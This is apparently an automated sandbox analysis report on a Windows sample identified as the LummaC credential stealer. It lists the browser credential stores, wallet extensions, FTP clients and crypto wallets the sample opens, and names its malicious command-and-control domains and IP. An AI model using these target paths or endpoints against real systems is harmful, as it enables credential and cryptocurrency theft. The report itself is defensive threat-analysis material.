Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2177937623.000000000108B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4872, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	34 Virtualization/Sandbox Evasion	2 OS Credential Dumping	751 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	34 Virtualization/Sandbox Evasion	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	223 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
necklacedmny.store	188.114.97.3	true	true	unknown
presticitpo.store	unknown	unknown	true	unknown
thumbystriw.store	unknown	unknown	true	unknown
crisiwarny.store	unknown	unknown	true	unknown
fadehairucw.store	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
presticitpo.store	true	unknown
necklacedmny.store	true	unknown
fadehairucw.store	true	unknown
founpiuer.store	true	unknown
crisiwarny.store	true	unknown
https://necklacedmny.store/api	true	unknown
scriptyprefej.store	true	unknown
navygenerayk.store	true	unknown
thumbystriw.store	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://necklacedmny.store/&	file.exe, 00000000.00000002.2275927536.000000000593B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	file.exe, 00000000.00000003.2207642867.000000000593F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://crisiwarny.store/Y	file.exe, 00000000.00000003.2148741597.0000000001024000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/api	file.exe, 00000000.00000003.2148545581.000000000102E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store:443/api	file.exe, 00000000.00000003.2148545581.000000000100E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.2207238726.0000000005C45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.mozilla.or	file.exe, 00000000.00000003.2207111466.000000000596E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://necklacedmny.store:443/api	file.exe, 00000000.00000002.2273459745.000000000100E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	file.exe, 00000000.00000003.2207642867.000000000593F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://presticitpo.store:443/api	file.exe, 00000000.00000003.2148545581.000000000100E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/)	file.exe, 00000000.00000003.2148741597.0000000001024000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.2207642867.000000000593F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://necklacedmny.store/api7	file.exe, 00000000.00000003.2245823719.00000000010A8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://presticitpo.store/	file.exe, 00000000.00000003.2148741597.0000000001024000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://presticitpo.store/A	file.exe, 00000000.00000003.2148741597.0000000001024000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.2207238726.0000000005C45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://necklacedmny.store/apiL	file.exe, 00000000.00000003.2190206884.000000000109E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	file.exe, 00000000.00000003.2207642867.000000000593F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://necklacedmny.store/m	file.exe, 00000000.00000002.2273459745.0000000001021000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://necklacedmny.store/X	file.exe, 00000000.00000003.2190157719.0000000005954000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190080162.0000000005954000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191068557.0000000005954000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190345414.0000000005954000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://necklacedmny.store/apimYH	file.exe, 00000000.00000003.2268195240.0000000001080000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2273979204.0000000001083000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://necklacedmny.store/	file.exe, 00000000.00000003.2245519986.000000000593B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177937623.000000000108B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2275927536.000000000593B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177399705.0000000001093000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2273459745.0000000001021000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.micro	file.exe, 00000000.00000003.2268195240.0000000001080000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000003.2207642867.000000000593F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://presticitpo.store:443/apizc:	file.exe, 00000000.00000003.2148545581.000000000100E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	file.exe, 00000000.00000003.2221257590.0000000005938000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221393810.0000000005939000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221240359.0000000005931000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221117784.0000000005930000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://crisiwarny.store/	file.exe, 00000000.00000003.2148741597.0000000001024000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	necklacedmny.store	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545755
Start date and time:	2024-10-30 23:10:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@5/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
18:11:09	API Interceptor	9x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	lf1SPbZI3V.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/alpha2/five/fre.php
	Comprobante de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/vdlzo
	Purchase_Order_pdf.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/g48c/
	zxalphamn.doc	Get hash	malicious	Lokibot	Browse	touxzw.ir/alpha2/five/fre.php
	rPO-000172483.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/2b9b/
	rPO_28102400.exe	Get hash	malicious	Lokibot	Browse	ghcopz.shop/ClarkB/PWS/fre.php
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
	SR3JZpolPo.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	5Z1WFRMTOXRH6X21Z8NU8.exe	Get hash	malicious	Unknown	Browse	artvisions-autoinsider.com/8bkjdSdfjCe/index.php
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/4hfb/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
necklacedmny.store	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	nG1F5SUnsm.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://hprus.conegutsud.com.pe/4zgrHK17910PyfC1508dysnmxbczx27005OLWUIBMTRFCEVBH25578NWDJ17331m12#2mzdvgfkgua042eh8kky7aanhr5dggelvb8fjk5yz6jna8o8e5	Get hash	malicious	Phisher	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	104.26.0.100
